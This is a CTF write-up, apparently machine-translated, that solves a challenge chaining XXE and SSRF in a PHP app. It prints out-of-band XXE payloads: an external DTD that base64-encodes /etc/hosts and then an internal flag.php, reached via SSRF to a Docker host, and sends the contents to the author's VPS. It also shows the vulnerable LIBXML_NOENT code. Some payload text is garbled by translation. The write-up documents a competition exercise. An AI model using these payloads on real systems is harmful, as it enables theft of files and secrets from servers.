A XXE and SSRF topic

[WriteUp] [writeUp] [SSRF]

Schools are in exam week,ennnn….. Engaged in the school competition met a xxE and SSRF combination of the topic, I feel quite good, simple record

Here is only a record of the process, the specific principle here are a few links (at that time is also reviewed the predecessors write better than me

Unknown attack how to know defense — XXE vulnerability attack and defense XXE vulnerability simple understanding and testing

VPS file file.dtd (xxe) :

<! ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hosts"> <! ENTITY % int "<! ENTITY &#37; Trick SYSTEM 'http://vps /? p=%payl; "> >"Copy the code

Loopholes in content

<! DOCTYPE convert [ <!ENTITY % remote SYSTEM"Http://my VPS address /file.dtd">%remote; %int; %trick; ] >Copy the code

Check server log(var/log/nginx/access.log)

Base64 decoding

127.0.0.1 localhost ::1 localhost ip6-localhost ip6-loopback fe00::0 ip6-localnet FF00 ::0 ip6-mcastPrefix ff02::1 Ip6-allnodes FF02 ::2 IP6-allRouters 172.17.0.6 Flag 5e8AF79b12ae XXessrF_FLAG_1 172.17.0.6 FLAG_1 5E8AF79B12ae Xxessrf_flag_1 172.17.0.6 XXessRF_FLAG_1 5E8AF79b12AE 172.17.0.7 74791d7AC29bCopy the code

Um ？？？？ Another layer?? Then read index

<! DOCTYPE html> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	 
	<title>XML</title>
	<link rel="stylesheet" href="./bootstrap.min.css">  
	<script src="./jquery.min.js"></script>
	<script src="./bootstrap.min.js"></script>
</head>
<body>

<form role="form" id="form" method="POST" action="index.php">
	<div class="form-group">
		<label for="name">XML</label>
		<textarea class="form-control" rows="6" name="data" placeholder="  Hello World!   "></textarea>
	</div>
  <div class="btn-group">
    <button type="button" class="btn btn-default" onclick="document.getElementById('form').submit()">SUBMIT</button> </div> <? php error_reporting(0); include("flag.php");
	if(isset($_POST['data']) and $_POST['data'] != "") {
		$xml = simplexml_load_string($_POST['data'], null, LIBXML_NOENT);
	}
	?>
  </form>
Copy the code

Oh?? Include (“flag.php”), try to read directly, no response, thinking also should, there are prompt SSRF so far, the morning work basically ended, the rest of the continuous daze until the afternoon…… xxessrf??? Start Probing the Intranet port…. From 8080… To 2018… Well, I gave up….. Finally picked it up again and sent hosts screenshots in the group of teammates

What is your 172.17.0.7?

. Docker, the Intranet reads the flag

<! ENTITY % payl SYSTEM"PHP: / / filter/read. = the convert base64 encode/resource = http://172.17.0.6/? file=php://filter/read=convert.base64-encode/resource=flag.php"> <! ENTITY % int"<!ENTITY &#37; trick SYSTEM 'http://我的VPS地址/?p=%payl;'>">
Copy the code

UEQ5d2FIQWdDaTh2WldOb2J5QWlZM1Z0ZEdOMFpudENNV2x1TTE5NGVETmZZVzVrWDNOemNtWmZNWE5mUTI5dmJEOTlJanNLUHo0S0NnPT0= ... <? php //echo "cumtctf{B1in3_xx3_and_ssrf_1s_Cool? }"; ? >Copy the code

Haven’t done a problem for a long time, the brain is a bit bad to make……

[WriteUp] [writeUp] [SSRF]

Related Posts

POJ 1659 Frogs’ Neighborhood(Havel-Hakimi theorem)【 解 析 】

Designers get paid less? Top 10 websites to help You Get 10 thousand fast

Continuous integration with Java 8, Jenkins, Jacoco and Sonar

POJ 1659 Frogs’ Neighborhood(Havel-Hakimi theorem)【解析】